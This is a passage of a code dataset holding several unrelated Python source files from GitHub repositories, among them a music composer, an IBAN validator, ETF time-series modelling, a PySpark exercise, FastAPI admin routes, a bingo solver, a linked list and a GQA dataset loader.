Waits for data and runs callbacks whenever necessary\n print(' [*] Waiting for messages. To exit press CTRL+C')\n channel.start_consuming()\n\n\nif __name__ == '__main__':\n try:\n get_image_web_color()\n except KeyboardInterrupt:\n print('Interrupted')\n try:\n sys.exit(0)\n except SystemExit:\n os._exit(0)\n\n","repo_name":"Netopil/Home_Work_BE_Senior","sub_path":"m2_compute/m2_compute.py","file_name":"m2_compute.py","file_ext":"py","file_size_in_byte":6578,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"35444618791","text":"import threading\nfrom random import choice, randint, random\n\nfrom roqba.composers.abstract_composer import AbstractComposer\nfrom roqba.static.scales_and_harmonies import STRICT_HARMONIES, FOUR_NOTE_HARMONIES\nfrom roqba.static.meters import METERS\nfrom roqba.composers.rhythm_and_meter_mixin import RhythmAndMeterMixin\n\nfrom roqba.utilities.sine_controllers import MultiSine\nfrom roqba.utilities import pd_wavetables, wavetable_peaks\n\n\nclass Composer(RhythmAndMeterMixin, AbstractComposer):\n def __init__(self, gateway, settings, behaviour, scale=\"HARMONIC\"):\n super(Composer, self).__init__(gateway,\n settings,\n behaviour)\n self.harm = {}\n self.speed_lim = behaviour['embellishment_speed_lim']\n self.selected_meters = (\"meters\" in list(self.behaviour.keys()) and\n self.behaviour[\"meters\"] or list(METERS.keys()))\n self.modified_note_in_current_frame = None\n self.generate_real_scale(settings['lowest_note_num'],\n settings['highest_note_num'])\n self.half_beat = self.behaviour['half_beat']\n self.second_beat_half = False\n\n # Rendezvous planning\n self.min_rendezvous_tickoffset = behaviour['min_rendezvous_tickoffset']\n self.max_rendezvous_tickoffset = behaviour['max_rendezvous_tickoffset']\n self.fixed_rendezvous_length = behaviour['fixed_rendezvous_length']\n self.min_rendezvous_length = behaviour['min_rendezvous_length']\n self.max_rendezvous_length = behaviour['max_rendezvous_length']\n self._setup_new_controller_wavetable()\n self.strategy_max_deviation_mapping = {\n 'conservative': 1.0,\n 'lax': 2.0,\n 'outgoing': 3.0,\n 'random': 1000\n }\n # Rendezvous handling\n self.num_rendezvous_between_caesurae = behaviour['num_rendezvous_between_caesurae']\n\n # setup state\n self.rendezvous_counter = 0\n self.ticks_counter = 0\n self.rendezvous_tick = False\n self.send_out_tick = -1\n self.select_next_harmony()\n self.select_next_anchor_tick(sendout_offset=1)\n self.prior_harmony = None\n\n self.set_binaural_diffs(self.behaviour['binaural_diff'])\n for voice in list(self.voices.values()):\n voice.slide = False\n args = [random() * 0.3 for n in range(4)]\n voice.pan_sine = MultiSine(args)\n\n if not settings['enable_adsr']:\n self.gateway.pd.send([\"voice\", voice.id, \"adsr_enable\", 0])\n\n def generate(self, state):\n \"\"\"main generating function, the next polyphonic step is produced here.\"\"\"\n self.ticks_counter += 1\n self.comment = 'normal'\n send_to_notator = False\n current_slide_time = self.rendezvous_offset * state['speed'] * 1000\n if self.rendezvous_tick == self.ticks_counter:\n send_to_notator = True\n self.rendezvous_counter += 1\n if self.rendezvous_counter > self.num_rendezvous_between_caesurae:\n self.rendezvous_counter = 0\n self.comment = 'caesura'\n self.prior_harmony = self.next_harmony\n self.select_next_harmony()\n sendout_offset = (self.fixed_rendezvous_length\n if self.fixed_rendezvous_length is not None\n else randint(self.min_rendezvous_length,\n self.max_rendezvous_length))\n self.select_next_anchor_tick(sendout_offset=sendout_offset)\n if self.send_out_tick == self.ticks_counter and self.behaviour['common_transitions']:\n transitions = self.determine_rendezvous_transition()\n for voice in list(self.voices.values()):\n if len(self.voices) < self.num_voices:\n raise RuntimeError(\"mismatch in voices count\")\n next_note = self.next_voice_note(voice)\n if next_note:\n # send a rendezvous message\n # duration, start_index, end_index, start_note, end_note, start_multiplier\n # and end_multiplier\n if not self.behaviour['common_transitions']:\n transitions = self.determine_rendezvous_transition(voice)\n transition = choice(transitions['downwards' if next_note <= voice.note else 'upwards'])\n\n self.gateway.pd.send([\n \"voice\",\n voice.id,\n \"rendezvous\",\n current_slide_time,\n transition['start'][0], # index\n transition['end'][0],\n voice.note, next_note,\n transition['start'][1], # multiplier\n transition['end'][1],\n ])\n voice.note = next_note\n else:\n voice.note_change = False\n continue\n cycle_pos = state['cycle_pos']\n send_drum = True\n if self.half_beat:\n if cycle_pos % 2 == 0:\n cycle_pos = cycle_pos // 2\n if self.second_beat_half:\n cycle_pos += int(self.meter[0] / 2)\n self.drummer.generator.send([state, cycle_pos])\n else:\n send_drum = False\n else:\n self.drummer.generator.send([state, cycle_pos])\n for k, v in list(self.drummer.frame.items()):\n # TODO: re-add the drum filler\n if False and v[\"meta\"]:\n if v[\"meta\"] == 'empty':\n threading.Thread(target=self.drum_fill_handler,\n args=(k, state)).start()\n if v[\"meta\"] == 'mark':\n threading.Thread(target=self.drum_mark_handler,\n args=(k, state)).start()\n if send_drum:\n self.gateway.drum_hub.send(self.drummer.frame)\n for voice in list(self.voices.values()):\n voice.update_current_microvolume()\n self.gateway.send_voice_pan(voice, voice.pan_sine.get_value())\n # self.gateway.send_voice_peak_level(voice, voice.current_microvolume)\n if self.notate and send_to_notator:\n self.notator.note_to_file({\"notes\": self.prior_harmony,\n \"weight\": state[\"weight\"],\n \"cycle_pos\": state[\"cycle_pos\"]})\n return self.comment\n\n def determine_rendezvous_transition(self, voice=None):\n if self.behaviour['transition_strategy'] == 'direct':\n transitions = self._direct_transitions()\n elif self.behaviour['transition_strategy'] in list(self.strategy_max_deviation_mapping.keys()):\n transitions = self._transitions_by_deviation(self.behaviour['transition_strategy'])\n else:\n transitions = {\n 'upwards': choice(self.rendezvous_transitions['upwards']),\n 'downwards': choice(self.rendezvous_transitions['downwards'])\n }\n return transitions\n\n def _setup_new_controller_wavetable(self):\n self.controller_wavetable_string = pd_wavetables.random_wavetable(partials=randint(3, 10))\n self.gateway.pd.send([\"sys\", \"controller_wavetable\", self.controller_wavetable_string])\n self.controller_wavetable = pd_wavetables._apply_wavetable(self.controller_wavetable_string)\n # the transitions are used for the single voices moving from one peak point to another\n self.rendezvous_transitions = wavetable_peaks.extract_peak_passages(\n self.controller_wavetable)\n\n def select_next_harmony(self):\n \"\"\"select the next rendezvous's harmony\"\"\"\n next_harmony_pattern = [0] + list(choice(STRICT_HARMONIES + FOUR_NOTE_HARMONIES))\n next_offset = randint(24, 48) # TODO: make something musical\n self.next_harmony = [note + next_offset + (randint(0, 2) * 12)\n for note in next_harmony_pattern]\n\n def select_next_anchor_tick(self, sendout_offset=0):\n \"\"\"set the next send-out and and rendezvous ticks\"\"\"\n self.send_out_tick = self.ticks_counter + sendout_offset\n self.rendezvous_offset = randint(self.min_rendezvous_tickoffset,\n self.max_rendezvous_tickoffset)\n self.rendezvous_tick = self.send_out_tick + self.rendezvous_offset\n\n def next_voice_note(self, voice):\n \"\"\"return the next note for a voice if it is the correct tick\"\"\"\n if self.send_out_tick == self.ticks_counter:\n return self.next_harmony[voice.id - 1]\n return False\n\n def _transitions_by_deviation(self, max_deviation):\n return {'upwards': [transition for transition in self.rendezvous_transitions['upwards']\n if transition['deviation'] <= max_deviation],\n 'downwards': [transition for transition in self.rendezvous_transitions['downwards']\n if transition['deviation'] <= max_deviation]}\n\n def _direct_transitions(self):\n return {'upwards': [transition for transition in self.rendezvous_transitions['upwards']\n if not transition['in_between']],\n 'downwards': [transition for transition in self.rendezvous_transitions['downwards']\n if not transition['in_between']]}\n","repo_name":"kr1/roqba","sub_path":"roqba/composers/rendezvous.py","file_name":"rendezvous.py","file_ext":"py","file_size_in_byte":9503,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"1053826972","text":"# International Bank Account Numbers (IBAN) validator\n\n# Check one: the total IBAN lenght is correct.\n\n# Move the first four characters to the end of the string,\n# replace each letter with its two-digit number representation\n# A = 10, B = 11, C = 12, ..., Z = 35\n# convert the string to an decimal integer\n\n# Check two: Compute the remainder of the previous number on division by 97;\n# if the remainder is 97, the check is passed.\n\n\niban = input(\"Enter IBAN, please: \")\niban = iban.replace(' ','')\n\nif not iban.isalnum():\n print(\"You have entered invalid characters.\")\nelif len(iban) < 15:\n print(\"IBAN entered is too short.\")\nelif len(iban) > 31:\n print(\"IBAN entered is too long.\")\nelse:\n iban = (iban[4:] + iban[0:4]).upper()\n iban2 = ''\n for ch in iban:\n if ch.isdigit():\n iban2 += ch\n else:\n iban2 += str(10 + ord(ch) - ord('A'))\n iban = int(iban2)\n if iban % 97 == 1:\n print(\"IBAN entered is valid.\")\n else:\n print(\"IBAN entered is invalid.\")\n\n \n\n\n","repo_name":"Miguelp-rez/Python-Essentials","sub_path":"Intermediate/Module2/Section5/iban_validator.py","file_name":"iban_validator.py","file_ext":"py","file_size_in_byte":1038,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"14356436419","text":"# coding:utf-8\n# 时间序列分析实操\n\n\nimport tushare as ts\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom statsmodels.graphics.tsaplots import *\nimport statsmodels.api as sm\nimport math\n# from sklearn.metrics import mean_squared_error\n\n\n#将八位数字的日期转换为yyyy-mm-dd\ndef TransfDate(d):\n\tyear = int(d/10000)\n\tmonth = int((d - year*10000)/100)\n\tday = int((d - year*10000 - month*100))\n\tdate = format(\"%4d-%02d-%02d\" % (year, month, day))\n\treturn date\n \n\n# 获取股票数据\ndef GetHistoryData(Code, BeginTime, EndTime):\n\tdf = ts.get_k_data(Code, index = False, start = TransfDate(BeginTime), end = TransfDate(EndTime))\n\treturn df\n\t\n\n# 计算模型预测的误差\n#def pre_error(data, model):\n#\trmse = math.sqrt(mean_squared_error(data, model))\n#\treturn rmse\n\t\n\t\nif __name__ == \"__main__\":\n\t# 读取历史数据,运行一次就行了。\n\t#df_300 = GetHistoryData(\"510300\", 20120531, 20200131)\n#\tdf_300.index = df_300[\"date\"]\n#\tdf_300 = df_300.drop([\"date\"], axis = 1)\n#\tdf_300.to_csv(\"300.csv\")\n#\tdf_nas = GetHistoryData(\"513100\", 20130531, 20200131)\n#\tdf_nas.index = df_nas[\"date\"]\n#\tdf_nas = df_nas.drop([\"date\"], axis = 1)\n#\tdf_nas.to_csv(\"nas.csv\")\n\t# 从保存的csv文件里读取数据\n\tdf_300 = pd.read_csv(\"300.csv\", index_col = \"date\", parse_dates = [\"date\"])\n\tdf_nas = pd.read_csv(\"nas.csv\", index_col = \"date\", parse_dates = [\"date\"])\n\tprint(df_300.head())\n\tprint(df_nas.head())\n\t\n\t# 将数据可视化\n\tfig = plt.figure()\n\tdf_300.plot(subplots = True)\n\tplt.title(\"300ETF\")\n\tplt.savefig(\"300ETF.png\")\n\tdf_nas.plot(subplots = True)\n\tplt.title(\"nasETF\")\n\tplt.savefig(\"nasETF.png\")\n\t\n\t# 重采样 画月线\n\tfig = plt.figure()\n\tdf_300[\"close\"].resample(\"M\").mean().plot(legend = True)\n\tplt.savefig(\"300ETF_month.png\")\n\t\n\t# 改变百分率图形\n\tfig = plt.figure()\n\tplt.subplot(211)\n\tdf_300.close.div(df_300.close.shift(1)).plot(figsize = (20, 8))\n\tplt.title(\"300ETF percent\")\n\tplt.subplot(212)\n\tdf_nas.close.div(df_nas.close.shift(1)).plot(figsize = (20, 8))\n\tplt.title(\"nasETF percent\")\n\tplt.savefig(\"percent.png\")\n\t\n\t# 计算收益率\n\tdf_300[\"returns\"] = df_300.close.pct_change().mul(100)\n\tdf_nas[\"returns\"] = df_nas.close.pct_change().mul(100)\n\tfig = plt.figure()\n\tplt.subplot(211)\n\tdf_300.returns.plot(figsize = (20,6))\n\tplt.subplot(212)\n\tdf_nas.returns.plot(figsize = (20,6))\n\tplt.savefig(\"returns.png\")\n\t\n\t# 相继列的绝对改变\n\tfig = plt.figure()\n\tplt.subplot(211)\n\tdf_300.close.diff().plot(figsize = (20, 6))\n\tplt.subplot(212)\n\tdf_nas.close.diff().plot(figsize = (20, 6))\n\tplt.savefig(\"absdiff.png\")\n\t\n\t# 比较两个序列\n\t# 正态化以前比较\n\tfig = plt.figure()\n\tdf_300.close.plot()\n\tdf_nas.close.plot()\n\tplt.legend([\"300etf\", \"nasetf\"])\n\tplt.savefig(\"compare1.png\")\n\t# 正态化,从同一时间点开始比较\n\tdf_300_cut = df_300.close[\"2013-05-31\":]\n\tnorm_300 = df_300_cut.div(df_300_cut.iloc[0]).mul(100)\n\tnorm_nas = df_nas.close.div(df_nas.close.iloc[0]).mul(100)\n\tfig = plt.figure()\n\tnorm_300.plot()\n\tnorm_nas.plot()\n\tplt.legend([\"300etf\", \"nasetf\"])\n\tplt.savefig(\"compare2.png\")\n\t# 窗口函数,90日均线\n\t# Rolling 相同大小和切片\n\trolling_300 = df_300.close.rolling(\"90D\").mean()\n\trolling_nas = df_nas.close.rolling(\"90D\").mean()\n\tfig = plt.figure()\n\tdf_300.close.plot()\n\trolling_300.plot()\n\tplt.savefig(\"rolling300.png\")\n\tfig = plt.figure()\n\tdf_nas.close.plot()\n\trolling_nas.plot()\n\tplt.savefig(\"rollingNAS.png\")\n\t# Expanding 包含之前所有数据\n\texpanding_300 = df_300.close.expanding().mean()\n\texpanding_nas = df_nas.close.expanding().mean()\n\tfig = plt.figure()\n\tdf_300.close.plot()\n\texpanding_300.plot()\n\tplt.savefig(\"expanding300.png\")\n\tfig = plt.figure()\n\tdf_nas.close.plot()\n\texpanding_nas.plot()\n\tplt.savefig(\"expandingNAS.png\")\n\tplt.close()\n\t# 两个指数的自相关性和部分自相关性\n\t# 自相关\n\tfig = plt.figure()\n\tplot_acf(df_300[\"close\"], lags = 25, title = \"300ETF\")\n\tplt.savefig(\"300acf.png\")\n\tfig = plt.figure()\n\tplot_acf(df_nas[\"close\"], lags = 25, title = \"nasETF\")\n\tplt.savefig(\"nasacf.png\")\n\t# 部分自相关\n\tfig = plt.figure()\n\tplot_pacf(df_300[\"close\"], lags = 25, title = \"300pETF\")\n\tplt.savefig(\"300pacf.png\")\n\tfig = plt.figure()\n\tplot_pacf(df_nas[\"close\"], lags = 25, title = \"naspETF\")\n\tplt.savefig(\"naspacf.png\")\n\t\n\t# 数据的趋势,季节性和噪音\n\t# plt.close()\n\t# 分解\n\t# fig = plt.figure()\n\tplt.rcParams[\"figure.figsize\"] = 11,9\n\tdecomposed_300 = sm.tsa.seasonal_decompose(df_300[\"close\"], freq = 360)\n\tfig = decomposed_300.plot()\n\tfig.savefig(\"decompose_300.png\")\n\tdecomposed_nas = sm.tsa.seasonal_decompose(df_nas[\"close\"], freq = 360)\n\tfig = decomposed_nas.plot()\n\tfig.savefig(\"decompose_nas.png\")\n\t\n\t# 用单位根检验方法来检验两个序列是否是随机行走的\n\tfrom statsmodels.tsa.stattools import adfuller\n\tadf_300 = adfuller(df_300[\"close\"])\n\tprint(\"300etf的单位根检验p值=%lf\" % adf_300[1])\n\tadf_nas = adfuller(df_nas[\"close\"])\n\tprint(\"NASetf的单位根检验p值=%lf\" % adf_nas[1])\n\t\n\t# 序列和序列差分的稳定性\n\tfig = plt.figure()\n\tplt.subplot(211)\n\tdecomposed_300.trend.plot()\n\tplt.subplot(212)\n\tdecomposed_300.trend.diff().plot()\n\tfig.savefig(\"stand300.png\")\n\tfig = plt.figure()\n\tplt.subplot(211)\n\tdecomposed_nas.trend.plot()\n\tplt.subplot(212)\n\tdecomposed_nas.trend.diff().plot()\n\tfig.savefig(\"standnas.png\")\n\t\n\t# 建立模型预测\n\t# AR模型\n\tfrom statsmodels.tsa.arima_model import ARMA\n\tdf300_model = ARMA(df_300[\"close\"].diff().iloc[1:].values, order = (1, 0))\n\tdf300_res = df300_model.fit()\n\tfig = plt.figure()\n\tfig = df300_res.plot_predict(start = 1000, end = 1100)\n\tfig.savefig(\"ar_300.png\")\n\tprint(df300_res.summary())\n\t# print(\"模型误差:%f\" % pre_error(df_300[\"close\"].diff().iloc[1:].values[1000:1100], df300_res.predict(start = 1000, end = 1100)))\n\tdfnas_model = ARMA(df_nas[\"close\"].diff().iloc[1:].values, order = (1, 0))\n\tdfnas_res = dfnas_model.fit()\n\tfig = plt.figure()\n\tfig = dfnas_res.plot_predict(start = 1000, end = 1100)\n\tfig.savefig(\"ar_nas.png\")\n\tprint(dfnas_res.summary())\n\t\n\t# MA模型\n\tdf300_ma = ARMA(df_300[\"close\"].diff().iloc[1:].values, order = (0, 1))\n\tdf300_res = df300_ma.fit()\n\tfig = plt.figure()\n\tfig = df300_res.plot_predict(start = 1000, end = 1100)\n\tfig.savefig(\"ma_300.png\")\n\tprint(df300_res.summary())\n\t# print(\"模型误差:%f\" % pre_error(df_300[\"close\"].diff().iloc[1:].values[1000:1100], df300_res.predict(start = 1000, end = 1100)))\n\tdfnas_ma = ARMA(df_nas[\"close\"].diff().iloc[1:].values, order = (0, 1))\n\tdfnas_res = dfnas_ma.fit()\n\tfig = plt.figure()\n\tfig = dfnas_res.plot_predict(start = 1000, end = 1100)\n\tfig.savefig(\"ma_nas.png\")\n\tprint(dfnas_res.summary())\n\t\n\t# ARMA模型\n\tdf300_arma = ARMA(df_300[\"close\"].diff().iloc[1:].values, order = (3, 3))\n\tdf300_res = df300_arma.fit()\n\tfig = plt.figure()\n\tfig = df300_res.plot_predict(start = 1000, end = 1100)\n\tfig.savefig(\"arma_300.png\")\n\tprint(df300_res.summary())\n\t# print(\"模型误差:%f\" % pre_error(df_300[\"close\"].diff().iloc[1:].values[1000:1100], df300_res.predict(start = 1000, end = 1100)))\n\t#dfnas_arma = ARMA(df_nas[\"close\"].diff().iloc[1:].values, order = (3, 3))\n#\tdfnas_res = dfnas_arma.fit()\n#\tfig = plt.figure()\n#\tfig = dfnas_res.plot_predict(start = 1000, end = 1100)\n#\tfig.savefig(\"arma_nas.png\")\n#\tprint(dfnas_res.summary())\n\n\t# ARIMA模型\n\tfrom statsmodels.tsa.arima_model import ARIMA\n\tdf300_arima = ARIMA(df_300[\"close\"].diff().iloc[1:].values, order = (2, 1, 0))\n\tdf300_res = df300_arima.fit()\n\tfig = plt.figure()\n\tfig = df300_res.plot_predict(start = 1000, end = 1100)\n\tfig.savefig(\"arima_300.png\")\n\tprint(df300_res.summary())\n\t\n\t# VAR模型\n\t#train_sample = pd.concat([norm_300.diff().iloc[1:], norm_nas.diff().iloc[1:]], axis = 1)\n#\tmodel = sm.tsa.VARMAX(train_sample, order = (2, 1), trend = \"c\")\n#\tresult = model.fit(maxiter = 1000, disp = True)\n#\tprint(result.summary())\n#\tfig = result.plot_diagnostics()\n#\tfig.savefig(\"var_dio.png\")\n#\tpre_res = result.predict(start = 1000, end = 1100)\n#\tfig = plt.figure()\n#\tplt.plot(pre_res)\n#\tfig.savefig(\"var_pre.png\")\n\t\n\t# SARIMA模型\n#\ttrain_sample = df_300[\"close\"].diff().iloc[1:].values\n#\tmodel = sm.tsa.SARIMAX(train_sample, order = (4, 0, 4), trend = \"c\")\n#\tresult = model.fit(maxiter = 1000, disp = True)\n#\tprint(result.summary())\n#\tfig = plt.figure()\n#\tplt.plot(train_sample[1:600], color = \"red\")\n#\tplt.plot(result.predict(start = 0, end = 600), color = \"blue\")\n#\tfig.savefig(\"SARIMA.png\")\n\t\n\t# 未观察成分模型\n\ttrain_sample = df_300[\"close\"].diff().iloc[1:].values\n\tmodel = sm.tsa.UnobservedComponents(train_sample, \"local level\")\n\tresult = model.fit(maxiter = 1000, disp = True)\n\tprint(result.summary())\n\tfig = plt.figure()\n\tplt.plot(train_sample[1:600], color = \"red\")\n\tplt.plot(result.predict(start = 0, end = 600), color = \"blue\")\n\tfig.savefig(\"unobserve.png\")\n\t\n\t# 动态因子模型\n\ttrain_sample = pd.concat([norm_300.diff().iloc[1:], norm_nas.diff().iloc[1:]], axis = 1)\n\tmodel = sm.tsa.DynamicFactor(train_sample, k_factors = 1, factor_order = 2)\n\tresult = model.fit(maxiter = 1000, disp = True)\n\tprint(result.summary())\n\tpredicted_result = result.predict(start = 0, end = 1000)\n\tfig = plt.figure()\n\tplt.plot(train_sample[:500], color = \"red\")\n\tplt.plot(predicted_result[:500], color = \"blue\")\n\tfig.savefig(\"dfmodel.png\")\n\t","repo_name":"zwdnet/MyQuant","sub_path":"12/times.py","file_name":"times.py","file_ext":"py","file_size_in_byte":9209,"program_lang":"python","lang":"en","doc_type":"code","stars":207,"dataset":"github-code","pt":"3"}
+{"seq_id":"5461238649","text":"import sys\nfrom pyspark import SparkContext, SparkConf\n\nconf = SparkConf().setAppName(\"Introductietraining-Spark\").setMaster(\"local[1]\")\nsc = SparkContext(conf = conf)\nsc.setLogLevel(\"ERROR\")\n\n# Oefening 6\n# Maak een RDD van van het bestand sales.csv in de map bestanden\n# Toon 2010 per genre het aantal records\n#\n# Sla het python script op\n# en voer het script uit in het terminal-venster onder in het scherm d.m.v. het commando \n# spark-submit Oefeningen-hoofdstuk-4-Transformaties/Oefening6.py\n\nsalesRdd = sc.textFile(\"Bestanden/sales.csv\")\nheader = salesRdd.first()\nsalesClean = salesRdd.filter(lambda x: x != header).filter(lambda line: line.split(\",\")[3]!=\"N/A\")\n\ngenres2010 = salesClean.map(lambda x: x.split(\",\")) \\\n .filter(lambda x: x[3]==\"2010\") \\\n .map(lambda x:x[4]) \\\n .countByValue()\n\nfor genre, count in genres2010.items():\n print(\"{} : {}\".format(genre, count))","repo_name":"martinsuijs/Introductie-training-spark","sub_path":"introductie-training-spark/Uitwerkingen-hoofdstuk-4-Transformaties/Oefening6.py","file_name":"Oefening6.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"nl","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"2121748902","text":"# верификация пользователей\n# верификация мероприятий\n# удаление пользователей\n\n\nfrom fastapi import APIRouter, HTTPException, Security, status\n\nfrom app.dependencies import anauthorized_exception, get_current_user\nfrom app.models.responses import UserResponse\nfrom app.models.user import User\nfrom app.services import user\n\nrouter = APIRouter(tags=[\"administration\"])\n\n\nasync def check(current_user: User, username: str, err_msg: str) -> None:\n if not current_user:\n raise anauthorized_exception\n\n if current_user.info.username == username:\n raise HTTPException(\n status_code=status.HTTP_409_CONFLICT,\n detail=\"You are cannot delete your account!\",\n )\n\n\n@router.delete(\"/user\")\nasync def deleting_user(\n username: str,\n current_user: User = Security(get_current_user, scopes=[\"administrator\"]),\n) -> UserResponse:\n \"\"\"Удаление конкретного пользователя\"\"\"\n\n await check(current_user, username, err_msg=\"You are cannot delete your account!\")\n\n return await user.delete(username)\n\n\n@router.patch(\"/verify\")\nasync def verify_user(\n username: str, current_user: User = Security(get_current_user, scopes=[\"administrator\"])\n) -> UserResponse:\n \"\"\"Верификация пользователя\"\"\"\n\n await check(current_user, username, err_msg=\"Could not verify yourself!\")\n\n return await user.verify(username)\n\n\n# @router.post(\"/verify/event\")\n# async def verify_event(\n# event: int, current_user: User | None = Depends(get_current_user)\n# ) -> VerificationResponse:\n# \"\"\"Вери��икация мероприятий\"\"\"\n# pass\n","repo_name":"Mawwlle/arrange-it","sub_path":"app/api/user/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"39204141348","text":"\nimport itertools\n\n\nclass board:\n\n def __init__(self, input):\n self._board = {}\n self._row = [0] * 5 \n self._column = [0] * 5\n self._marked = [0] * 25\n self._complete_line = [False] * 10\n self._complete = False\n self._marked_sum = 0 \n self.make_board(input)\n\n # should have used numpy\n def make_board(self,input):\n for i in range(0,5):\n for j in range(0,5):\n self._board[input[(5*i) + j]] = (i,j)\n \n def in_board(self,number):\n\n try:\n x,y = self._board[number]\n self._row[x] +=1\n if self._row[x] == 5:\n self._complete_line[x] = True\n self._complete = True \n self._column[y] +=1\n if self._column[y] == 5:\n self._complete_line[5+y] = True\n self._complete = True \n self._marked_sum += number\n return True\n\n except KeyError:\n return False \n\n #this can be a getter.\n def win(self):\n return self._complete\n\n def unmarked_score(self):\n total = 0\n for key in self._board.keys():\n total +=key\n return total-self._marked_sum\n\n def reset(self):\n self._row = [0] * 5 \n self._column = [0] * 5\n self._marked = [0] * 25\n self._complete_line = [False] * 10\n self._complete = False\n self._marked_sum = 0\n return self\n\n\n\ndef reader(filename):\n\n draws = 0\n boards = []\n with open(filename,\"r\") as file:\n data = [line.strip() for line in file]\n draws = [int(x) for x in data[0].split(\",\")]\n\n for idx in range(2,len(data),6):\n to_int = lambda x: [int(x) for x in data[x].split()]\n\n boards.append(list(itertools.chain(to_int(idx), to_int(idx+1), to_int(idx+2), to_int(idx+3), to_int(idx+4))))\n\n return draws,boards\n \n\n# part a \n\ndraws,board_sets = reader(\"4_input.txt\")\n\nboard_obj = [board(x) for x in board_sets]\n\nwin_board = None\nwin_num = -1\nfor num in draws:\n for tile in board_obj:\n if tile.in_board(num):\n if tile.win():\n win_board = tile\n win_num = num\n break\n\n if win_num != -1:\n break\n\nprint(win_num*win_board.unmarked_score())\n\n\n#part b \nf = lambda x: x.reset()\nboard_obj = [f(tile) for tile in board_obj]\n\nlast_win_board = None\nlast_win_num = -1 \nfor num in draws:\n for idx,tile in enumerate(board_obj):\n\n # if board has already been completed skip\n if tile.win():\n continue\n if tile.in_board(num):\n if tile.win():\n last_win_board = tile\n last_win_num = num\n\nprint(last_win_num*last_win_board.unmarked_score())\n","repo_name":"MaazJamal/AOC2021","sub_path":"4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":2785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"73725197842","text":"#insert at a node \nclass Node :\n def __init__(self,data,next):\n self.data=data\n self.next=next\nclass LinkedList:\n head =None\n def insertAtbegining(self,data):\n node=Node(data,self.head)\n self.head=node\n def print(self):\n if self.head is None:\n print(\"linkList is empty\")\n return\n ltsr=''\n itr=self.head\n while itr:\n ltsr+=str(itr.data)\n itr=itr.next\n print(ltsr)\n def insert_At_end(self,data):\n if self.head is None:\n self.head=Node(data,None)\n return\n itr=self.head\n while itr:\n itr=itr.next\n itr.next=Node(data,None)\n def get_length(self):\n count=0\n itr=self.head\n while itr:\n count+=1\n itr=itr.next\n return count\n def remove_At(self,index):\n if index <0 or index>=self.get_length():\n raise Exception(\"invalid index\")\n if index== 0:\n self.heaf =self.head.next\n return\n count =0\n itr=self.head\n while itr:\n \n if count == index-1:\n itr.next=itr.next.next\n break\n\n itr=itr.next\n count +=1\n def insert_At(self,index,data):\n if index <0 or index>=self.get_length():\n raise Exception(\"invalid index\")\n if index ==0:\n self.insertAtbegining(data)\n return\n count =0\n itr=self.head\n while itr:\n \n if count == index-1:\n node=Node(data,itr.next)\n itr.next=node\n break\n itr=itr.next\n count+=1\n\n\n\n\n \n \nif __name__ =='__main__':\n lt=LinkedList()\n lt.insertAtbegining(1)\n lt.insertAtbegining(2)\n lt.print()\n","repo_name":"asujan205/DataStructure-using-python","sub_path":"linklist.py","file_name":"linklist.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"18680950438","text":"#!/usr/bin/env python3\n\nimport subprocess\n\niterations = 3\ntime = 0.\nfor i in range(1, iterations+1):\n print(\"running Spatiocyte, iteration\", i, \"of\", iterations)\n result = subprocess.run(['ecell3-session', 'model.py'],\n stdout=subprocess.PIPE)\n time = time + float(result.stdout.decode('utf-8').split('\\n')[-2].\n split(' ')[-1])\ntime = time/iterations\nprint(\"elapsed time (s):\", time)\n\nwith open(\"elapsed_time.txt\", \"w+\") as f:\n f.write(\"%f\" % time)\n","repo_name":"satya-arjunan/pspatiocyte","sub_path":"src/pspatiocyte/models/benchmark/spatiocyte/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"72615121361","text":"import json\nfrom pathlib import Path\n\nimport torch\nimport torchvision\nfrom transformers import RobertaTokenizerFast\n\nfrom .coco import ConvertCocoPolysToMask, ModulatedDetection, make_coco_transforms\n\n\nclass GQADetection(ModulatedDetection):\n pass\n\n\nclass GQAQuestionAnswering(torchvision.datasets.CocoDetection):\n def __init__(self, img_folder, ann_file, transforms, return_masks, return_tokens, tokenizer, ann_folder):\n super(GQAQuestionAnswering, self).__init__(img_folder, ann_file)\n self._transforms = transforms\n self.prepare = ConvertCocoPolysToMask(return_masks, return_tokens, tokenizer=tokenizer)\n with open(ann_folder / \"gqa_answer2id.json\", \"r\") as f:\n self.answer2id = json.load(f)\n with open(ann_folder / \"gqa_answer2id_by_type.json\", \"r\") as f:\n self.answer2id_by_type = json.load(f)\n self.type2id = {\"obj\": 0, \"attr\": 1, \"rel\": 2, \"global\": 3, \"cat\": 4}\n\n def __getitem__(self, idx):\n img, target = super(GQAQuestionAnswering, self).__getitem__(idx)\n image_id = self.ids[idx]\n coco_img = self.coco.loadImgs(image_id)[0]\n caption = coco_img[\"caption\"]\n dataset_name = coco_img[\"dataset_name\"]\n questionId = coco_img[\"questionId\"]\n target = {\"image_id\": image_id, \"annotations\": target, \"caption\": caption}\n img, target = self.prepare(img, target)\n if self._transforms is not None:\n img, target = self._transforms(img, target)\n target[\"dataset_name\"] = dataset_name\n target[\"questionId\"] = questionId\n\n if coco_img[\"answer\"] not in self.answer2id:\n answer = \"unknown\"\n else:\n answer = coco_img[\"answer\"]\n\n target[\"answer\"] = torch.as_tensor(self.answer2id[answer], dtype=torch.long)\n target[\"answer_type\"] = torch.as_tensor(self.type2id[coco_img[\"question_type\"]], dtype=torch.long)\n\n if coco_img[\"answer\"] not in self.answer2id_by_type[\"answer_attr\"]:\n answer = \"unknown\"\n else:\n answer = coco_img[\"answer\"]\n target[\"answer_attr\"] = 